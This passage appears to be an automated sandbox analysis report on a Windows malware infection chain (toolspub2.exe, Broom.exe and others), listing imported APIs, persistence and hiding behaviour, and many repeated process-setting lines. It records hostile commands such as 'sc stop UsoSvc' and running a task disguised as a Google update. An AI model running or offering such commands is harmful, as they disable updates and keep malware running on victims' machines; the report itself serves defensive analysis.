                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: 3_2_00429C40 CharUpperW,CharToOemBuffA,CharToOemBuffA,AddConsoleAliasW,GetAltTabInfoA,DrawCaption,WinHttpGetProxyForUrl,SetThreadContext,GetFileAttributesExA,DragAcceptFiles,CoGetInstanceFromFile,__putw,GetConsoleAliasesLengthW,WriteConsoleOutputCharacterA,EnumDateFormatsExW,GetConsoleAliasesLengthW,WriteConsoleOutputCharacterA,EnumDateFormatsExW,FindNextVolumeMountPointA,GlobalAlloc,GetWindowsDirectoryW,SetThreadIdealProcessor,GetWindowsDirectoryW,SetThreadIdealProcessor,ReadConsoleOutputCharacterW,FatalAppExitW,BuildCommDCBAndTimeoutsA,GetVolumeInformationW,GetConsoleAliasA,SetProcessShutdownParameters,SetConsoleCP,FindAtomW,GetTempPathA,CompareStringA,GetCurrentDirectoryW,lstrlenW,GetLocaleInfoW,GetCommConfig,CancelIo,_hread,CreateHardLinkA,ConvertFiberToThread,DeleteVolumeMountPointA,EnumSystemCodePagesA,GetEnvironmentStringsW,InterlockedIncrement,InterlockedDecrement,GetProcessVersion,SetLocaleInfoA,_hread,_hread,_hread,ReadConsoleInputW,GetPrivateProfileIntW,GetConsoleAliasExesA,OpenJobObjectA,SetTapeParameters,CreateNamedPipeW,BuildCommDCBAndTimeoutsW,VerSetConditionMask,GetCurrencyFormatW,lstrcpyA,ExitProcess,WriteConsoleInputW,GetFileAttributesA,GetStringTypeW,GetPrivateProfileStringA,OpenSemaphoreA,WriteConsoleOutputW,WriteConsoleInputW,AddConsoleAliasW,HeapCreate,DeleteFileA,WriteConsoleInputW,GetFileAttributesA,WaitNamedPipeW,GetCalendarInfoW,CreateDirectoryExW,GetModuleHandleA,SetThreadLocale,_hread,GetCurrentProcess,MoveFileWithProgressA,HeapFree,EnumSystemCodePagesA,FoldStringA,SetFileShortNameW,InterlockedPushEntrySList,QueryDosDeviceA,BuildCommDCBAndTimeoutsW,QueryPerformanceFrequency,FindNextFileW,SetCommState,VerifyVersionInfoW,FindNextVolumeMountPointW,SetCalendarInfoA,GetShortPathNameW,GetVolumePathNameW,GetVolumeNameForVolumeMountPointA,GetConsoleAliasesLengthA,TlsFree,GetDriveTypeW,SetComputerNameA,Process32FirstW,GetFileAttributesA,GetStringTypeW,GetStringTypeW,GetDriveTypeA,GetSystemWindowsDirectoryA,InterlockedPopEntrySList,EnumSystemLocalesW,GetCommState,IsWow64Process,GetSystemDirectoryA,GetTempPathW,AddAtomW,GetSystemWindowsDirectoryW,DisconnectNamedPipe,AddAtomW,GetSystemWindowsDirectoryW,DisconnectNamedPipe,GetConsoleMode,VirtualProtect,InterlockedIncrement,GetCharWidthFloatA,InterlockedIncrement,GetCharWidthFloatA,ClearEventLogA,GlobalUnfix,OpenWaitableTimerA,GlobalFlags,LocalFlags,_llseek,GetDlgCtrlID,DebugActiveProcess,GetDlgCtrlID,DebugActiveProcess,WritePrivateProfileSectionW,SleepEx,GetUserDefaultLangID,_llseek,GlobalUnlock,InitiateSystemShutdownA,AbortSystemShutdownW,WinHttpReadData,WinHttpOpen,WinHttpWriteData,RevertToSelf,LoadLibraryW,GetConsoleCursorInfo,GetConsoleOutputCP,TerminateProcess,FindFirstFileW,InterlockedDecrement,GetModuleHandleW,CreateActCtxW,_lclose,ReadConsoleW,GetNamedPipeHandleStateW,GlobalFindAtomW,lstrlenA,GetModuleHandleA,VerLanguageNameW,CreateEventW,ExpandEnvironmentStringsA,GetProcessAffinityMask,SetTimeZoneInformation,ActivateActCtx,DeleteVolumeMountPointA,3_2_00429C40

                          Boot Survival

                          barindex
                          Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc

                          Hooking and other Techniques for Hiding and Protection

                          barindex
                          Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\cdttvvc:Zone.Identifier read attributes | delete
                          Source: C:\Program Files\Google\Chrome\updater.exeModule Loaded: C:\WINDOWS\TEMP\WHXCDQSCJSWQ.TMP
                          Source: C:\Program Files\Google\Chrome\updater.exeModule Loaded: C:\WINDOWS\TEMP\WHXCDQSCJSWQ.TMP
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: 3_2_00429C40 CharUpperW,CharToOemBuffA,CharToOemBuffA,AddConsoleAliasW,GetAltTabInfoA,DrawCaption,WinHttpGetProxyForUrl,SetThreadContext,GetFileAttributesExA,DragAcceptFiles,CoGetInstanceFromFile,__putw,GetConsoleAliasesLengthW,WriteConsoleOutputCharacterA,EnumDateFormatsExW,GetConsoleAliasesLengthW,WriteConsoleOutputCharacterA,EnumDateFormatsExW,FindNextVolumeMountPointA,GlobalAlloc,GetWindowsDirectoryW,SetThreadIdealProcessor,GetWindowsDirectoryW,SetThreadIdealProcessor,ReadConsoleOutputCharacterW,FatalAppExitW,BuildCommDCBAndTimeoutsA,GetVolumeInformationW,GetConsoleAliasA,SetProcessShutdownParameters,SetConsoleCP,FindAtomW,GetTempPathA,CompareStringA,GetCurrentDirectoryW,lstrlenW,GetLocaleInfoW,GetCommConfig,CancelIo,_hread,CreateHardLinkA,ConvertFiberToThread,DeleteVolumeMountPointA,EnumSystemCodePagesA,GetEnvironmentStringsW,InterlockedIncrement,InterlockedDecrement,GetProcessVersion,SetLocaleInfoA,_hread,_hread,_hread,ReadConsoleInputW,GetPrivateProfileIntW,GetConsoleAliasExesA,OpenJobObjectA,SetTapeParameters,CreateNamedPipeW,BuildCommDCBAndTimeoutsW,VerSetConditionMask,GetCurrencyFormatW,lstrcpyA,ExitProcess,WriteConsoleInputW,GetFileAttributesA,GetStringTypeW,GetPrivateProfileStringA,OpenSemaphoreA,WriteConsoleOutputW,WriteConsoleInputW,AddConsoleAliasW,HeapCreate,DeleteFileA,WriteConsoleInputW,GetFileAttributesA,WaitNamedPipeW,GetCalendarInfoW,CreateDirectoryExW,GetModuleHandleA,SetThreadLocale,_hread,GetCurrentProcess,MoveFileWithProgressA,HeapFree,EnumSystemCodePagesA,FoldStringA,SetFileShortNameW,InterlockedPushEntrySList,QueryDosDeviceA,BuildCommDCBAndTimeoutsW,QueryPerformanceFrequency,FindNextFileW,SetCommState,VerifyVersionInfoW,FindNextVolumeMountPointW,SetCalendarInfoA,GetShortPathNameW,GetVolumePathNameW,GetVolumeNameForVolumeMountPointA,GetConsoleAliasesLengthA,TlsFree,GetDriveTypeW,SetComputerNameA,Process32FirstW,GetFileAttributesA,GetStringTypeW,GetStringTypeW,GetDriveTypeA,GetSystemWindowsDirectoryA,InterlockedPopEntrySList,EnumSystemLocalesW,GetCommState,IsWow64Process,GetSystemDirectoryA,GetTempPathW,AddAtomW,GetSystemWindowsDirectoryW,DisconnectNamedPipe,AddAtomW,GetSystemWindowsDirectoryW,DisconnectNamedPipe,GetConsoleMode,VirtualProtect,InterlockedIncrement,GetCharWidthFloatA,InterlockedIncrement,GetCharWidthFloatA,ClearEventLogA,GlobalUnfix,OpenWaitableTimerA,GlobalFlags,LocalFlags,_llseek,GetDlgCtrlID,DebugActiveProcess,GetDlgCtrlID,DebugActiveProcess,WritePrivateProfileSectionW,SleepEx,GetUserDefaultLangID,_llseek,GlobalUnlock,InitiateSystemShutdownA,AbortSystemShutdownW,WinHttpReadData,WinHttpOpen,WinHttpWriteData,RevertToSelf,LoadLibraryW,GetConsoleCursorInfo,GetConsoleOutputCP,TerminateProcess,FindFirstFileW,InterlockedDecrement,GetModuleHandleW,CreateActCtxW,_lclose,ReadConsoleW,GetNamedPipeHandleStateW,GlobalFindAtomW,lstrlenA,GetModuleHandleA,VerLanguageNameW,CreateEventW,ExpandEnvironmentStringsA,GetProcessAffinityMask,SetTimeZoneInformation,ActivateActCtx,DeleteVolumeMountPointA,3_2_00429C40
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\InstallSetup5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Broom.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Broom.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Broom.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Broom.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Broom.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Broom.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Broom.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Broom.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Broom.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Broom.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
